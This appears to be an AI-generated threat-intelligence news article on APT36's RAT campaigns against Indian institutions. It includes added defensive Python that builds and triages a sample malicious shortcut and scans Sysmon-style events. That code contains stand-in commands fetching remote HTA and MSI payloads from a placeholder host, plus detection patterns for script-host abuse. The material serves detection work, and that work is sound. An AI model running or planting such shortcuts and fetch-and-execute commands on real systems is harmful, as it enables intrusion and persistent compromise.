

Ethical Hacking News

New RAT Attacks Target Indian Government and Academia: Transparent Tribe's Evolving Arsenal



Transparent Tribe, also tracked as APT36, has been linked to fresh attacks targeting Indian governmental, academic, and strategic entities with a remote access trojan (RAT) that grants persistent control over compromised hosts. The group's RAT arsenal has evolved over the years, with past variants including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT, and it remains a persistent, strategically driven cyber-espionage threat focused on intelligence collection from Indian government entities, educational institutions, and other strategically relevant sectors.

  • Transparent Tribe (also tracked as APT36), a state-sponsored hacking group believed to be of Pakistani origin, has been linked to fresh attacks targeting Indian governmental, academic, and strategic entities.
  • The latest attacks use a remote access trojan (RAT) that grants persistent control over compromised hosts, delivered through deceptive techniques that avoid raising user suspicion.
  • The HTA script that loads the RAT uses ActiveX objects, particularly WScript.Shell, to profile the environment and interact with the Windows host at runtime.
  • Transparent Tribe selects its persistence method based on which antivirus product is installed on the infected machine.
  • StreamSpy, a trojan that uses WebSocket and HTTP for C2 communication, surfaced in the same reporting cycle; it is attributed to Maha Grass (the name Chinese vendors use for Patchwork, a distinct India-aligned group), not to Transparent Tribe.
  • Against Indian organizations the group uses spear-phishing emails, malicious shortcut files, and Visual Basic Script to establish persistence and remote command execution.


    Transparent Tribe, a state-sponsored hacking group believed to be of Pakistani origin, has been linked to fresh attacks targeting Indian governmental, academic, and strategic entities. The latest set of attacks employs a remote access trojan (RAT) that grants the threat actor persistent control over compromised hosts.

    The RAT, used in conjunction with deceptive delivery techniques such as weaponized Windows shortcut files masquerading as legitimate PDF documents, allows Transparent Tribe to evade user suspicion. The threat actor's arsenal of RATs has been evolving over the years, with past variants including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.

    In the latest campaign, spear-phishing emails carry ZIP archives containing LNK files disguised as PDFs. Once the shortcut is opened, it launches "mshta.exe" to execute a remote HTML Application (HTA) script, which decrypts and loads the final RAT payload directly in memory.
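The shortcut itself is the first artifact a responder gets hold of, so it is worth knowing what a weaponized .LNK looks like on disk. The following Python is an added example, not code from the article or from any vendor report: it builds a constructed Shell Link file in the shape described above (relative path to mshta.exe, a remote HTA as the argument, a PDF-reader icon, minimised window), then parses it back with a minimal MS-SHLLINK reader and flags the suspicious traits. The parser also skips the LinkTargetIDList and LinkInfo blocks that real shortcuts usually carry, so it works on files taken from a phishing ZIP, not only on the constructed sample. The URL, icon path and file names are placeholders, not indicators from the campaign.

```python
import struct
import uuid

# Shell Link header layout and LinkFlags bits from the MS-SHLLINK specification.
LNK_HEADER = "<I16sIIQQQIiIHHII"          # 76-byte ShellLinkHeader
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7                     # window minimised and not activated
STRING_DATA = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
               (HAS_ICON_LOCATION, "icon_location")]
LOLBINS = ("mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe",
           "cscript.exe", "rundll32.exe", "msiexec.exe")


def build_lnk(relative_path, arguments, icon_location, show_command=SW_SHOWMINNOACTIVE):
    """Build a constructed, minimal Unicode .LNK carrying only StringData sections."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack(LNK_HEADER, 0x4C, LNK_CLSID.bytes_le, flags,
                         0x20,                  # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,               # creation/access/write FILETIMEs
                         0, 0,                  # FileSize, IconIndex
                         show_command, 0, 0, 0, 0)  # HotKey and Reserved fields

    def string_data(text):
        # CountCharacters (uint16) followed by UTF-16LE characters, no terminator.
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + b"".join(map(string_data, (relative_path, arguments, icon_location)))


def parse_lnk(data):
    """Return the StringData fields and ShowCommand of a Shell Link as a dict."""
    fields = struct.unpack_from(LNK_HEADER, data, 0)
    size, clsid, flags, show_command = fields[0], fields[1], fields[2], fields[9]
    if size != 0x4C or uuid.UUID(bytes_le=clsid) != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:        # skip IDListSize + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    out = {"show_command": show_command}
    for flag, name in STRING_DATA:             # fixed order per the spec
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            out[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            out[name] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return out


def triage_lnk(data):
    """Flag traits of a weaponised shortcut; returns a list of reason tags."""
    f = parse_lnk(data)
    command = f"{f.get('relative_path', '')} {f.get('arguments', '')}".lower()
    binary = f.get("relative_path", "").rsplit("\\", 1)[-1].lower()
    icon = f.get("icon_location", "").lower()
    reasons = []
    if binary in LOLBINS:
        reasons.append(f"lolbin:{binary}")
    if "http://" in command or "https://" in command:
        reasons.append("remote-url")
    if icon.endswith(".pdf") or "acrobat" in icon or "acrord32" in icon:
        reasons.append("pdf-icon-masquerade")  # looks like a document, runs a program
    if f["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("minimised-window")
    return reasons


# Constructed samples; the URL and icon path are placeholders, not indicators.
MALICIOUS_LNK = build_lnk(r"..\..\..\Windows\System32\mshta.exe",
                          "https://example.invalid/advisory.hta",
                          r"%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe")
BENIGN_LNK = build_lnk(r"..\..\Documents\report.pdf", "", "", show_command=1)

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, parse_lnk(blob), triage_lnk(blob))
```

Run it against a real shortcut with `triage_lnk(open(path, "rb").read())`; a relative path ending in a living-off-the-land binary plus a URL in the arguments is the combination to escalate on, and a document icon on a shortcut that runs a program is the masquerade the campaign relies on.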

    The HTA also downloads and opens a decoy PDF document to avoid arousing user suspicion. The script uses ActiveX objects, particularly WScript.Shell, to interact with the Windows environment: it profiles the host and adjusts its behaviour at runtime to stay compatible with the target system and improve execution reliability, techniques commonly observed in malware.

    One notable aspect of the malware is its ability to adapt its persistence method based on the antivirus solutions installed on the infected machine. If Kaspersky is detected, it creates a working directory under "C:\Users\Public\core\" and writes an obfuscated HTA payload to disk. It establishes persistence by dropping a LNK file in the Windows Startup folder that launches the HTA script using "mshta.exe."

    If Quick Heal, Avast, AVG, or Avira is detected, it instead establishes persistence by creating batch files and malicious LNK files in the Windows Startup folder. If no recognized antivirus product is detected, it falls back to a combination of batch file execution and registry-based persistence, deploying the payload before launching the batch script.

    Separately, StreamSpy, a trojan that surfaced in the same reporting cycle, is attributed to Maha Grass (the name Chinese vendors use for Patchwork, a separate India-aligned espionage group) rather than to Transparent Tribe. StreamSpy harvests system information, establishes persistence via the Windows Registry, a scheduled task, or a LNK file in the Startup folder, and communicates with its C2 server over HTTP and WebSocket.

    The threat actor has been linked to several campaigns targeting Indian organizations in recent weeks. One such campaign leverages a malicious shortcut file disguised as a government advisory PDF to deliver a .NET-based loader, which then drops additional executables and malicious DLLs to establish remote command execution, system reconnaissance, and long-term access.

    The shortcut executes an obfuscated cmd.exe command that retrieves an MSI installer from a remote server. The installer extracts and displays a decoy PDF document, decodes and writes DLL files to specific locations on the victim's system, drops a malicious executable, and establishes persistence by creating a Visual Basic Script that launches that executable at every system startup.

    A malicious DLL named "wininet.dll" (borrowing the name of the legitimate Windows library) connects to hard-coded command-and-control (C2) infrastructure at dns.wmiprovider.com, a domain registered in mid-April 2025. The DLL implements multiple HTTP GET-based endpoints to establish communication with the C2 server, perform updates, and retrieve attacker-issued commands.
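Both chains described above (LNK to mshta.exe pulling a remote HTA, with Startup-folder or Run-key persistence; and LNK to cmd.exe pulling a remote MSI, with a VBS launcher) leave a small, consistent set of endpoint telemetry behind. The following is an added example, not code from the article or from any vendor report, of detection logic run over constructed Sysmon-style events: process creation (ID 1), file creation (ID 11) and registry value set (ID 13). The file names, hostnames and SID in the sample events are placeholders; the ATT&CK technique IDs are the standard ones for mshta, msiexec, Visual Basic and Run-key/Startup-folder persistence.

```python
import re

# Sysmon event IDs used below: process create, file create, registry value set.
PROCESS_CREATE, FILE_CREATE, REGISTRY_SET = 1, 11, 13

URL_RE = re.compile(r"https?://", re.I)
STARTUP_DIR_RE = re.compile(r"\\start menu\\programs\\startup\\", re.I)
USER_WRITABLE_RE = re.compile(r"\\(users\\public|appdata|temp|programdata)\\", re.I)
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\\", re.I)
SCRIPT_PAYLOAD_RE = re.compile(r"mshta|wscript|cscript|\.bat\b|\.vbs\b|\.hta\b", re.I)
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
PERSISTENCE_EXTS = (".lnk", ".bat", ".vbs", ".hta")


def image_name(path):
    """Basename of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(event):
    """Return (ATT&CK technique, description) findings for one event."""
    findings = []
    image = image_name(event.get("Image", ""))
    if event["EventID"] == PROCESS_CREATE:
        cmd = event.get("CommandLine", "")
        if image == "mshta.exe" and URL_RE.search(cmd):
            findings.append(("T1218.005", "mshta.exe executing a remote HTA"))
        if image == "cmd.exe" and "msiexec" in cmd.lower() and URL_RE.search(cmd):
            findings.append(("T1218.007", "cmd.exe invoking msiexec on a remote MSI"))
        if image in ("wscript.exe", "cscript.exe") and USER_WRITABLE_RE.search(cmd):
            findings.append(("T1059.005", "script host running a script from a user-writable path"))
    elif event["EventID"] == FILE_CREATE:
        target = event["TargetFilename"]
        # Installers legitimately drop Startup shortcuts; a script host doing it is not normal.
        if (STARTUP_DIR_RE.search(target) and target.lower().endswith(PERSISTENCE_EXTS)
                and image in SCRIPT_HOSTS):
            findings.append(("T1547.001", f"{image} dropped {image_name(target)} into the Startup folder"))
    elif event["EventID"] == REGISTRY_SET:
        if RUN_KEY_RE.search(event["TargetObject"]) and SCRIPT_PAYLOAD_RE.search(event.get("Details", "")):
            findings.append(("T1547.001", "Run key points at a script host or batch file"))
    return findings


def scan(events):
    """Run detect() over a list of events; one dict per finding, in event order."""
    return [{"event": i, "technique": t, "description": d}
            for i, e in enumerate(events) for t, d in detect(e)]


# Constructed sample telemetry modelled on the chains described above. Hostnames,
# file names and the SID are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://example.invalid/advisory.hta'},
    {"EventID": 11, "Image": r"C:\Windows\System32\mshta.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c msiexec /i https://example.invalid/advisory.msi /qn"},
    {"EventID": 13, "Image": r"C:\Windows\System32\cmd.exe",
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\Public\core\run.bat"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\AppData\Roaming\svc.vbs"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",          # benign
     "CommandLine": "cmd.exe /c dir"},
    {"EventID": 11, "Image": r"C:\Program Files\SomeTool\setup.exe",   # benign installer
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SomeTool.lnk"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The useful design point is in the file-create rule: a shortcut landing in the Startup folder is common and noisy, but one written by mshta.exe, cmd.exe or a script host is the exact behaviour the campaign exhibits, so the rule keys on the writing process rather than the file alone. The Run-key rule likewise keys on what the value points at, which catches the batch-file fallback regardless of the value name chosen.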

    The emergence of StreamSpy and Spyder variants from Maha Grass (Patchwork) indicates that that group is continuously iterating its attack toolset. Its use of WebSocket channels for command issuance and result feedback is intended to evade detection and filtering of plain HTTP traffic. Correlated samples further confirm that Maha Grass and DoNot share resources to some degree.

    Transparent Tribe remains a highly persistent and strategically driven cyber-espionage threat, with a sustained focus on intelligence collection from Indian government entities, educational institutions, and other strategically relevant sectors. APT36's evolving RAT arsenal and its ability to tailor persistence to the installed antivirus product make it a formidable opponent in the world of cyber espionage.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/New-RAT-Attacks-Target-Indian-Government-and-Academia-Transparent-Tribes-Evolving-Arsenal-ehn.shtml

  • Published: Fri Jan 2 08:04:56 2026 by llama3.2 3B Q4_K_M
    © Ethical Hacking News . All rights reserved.
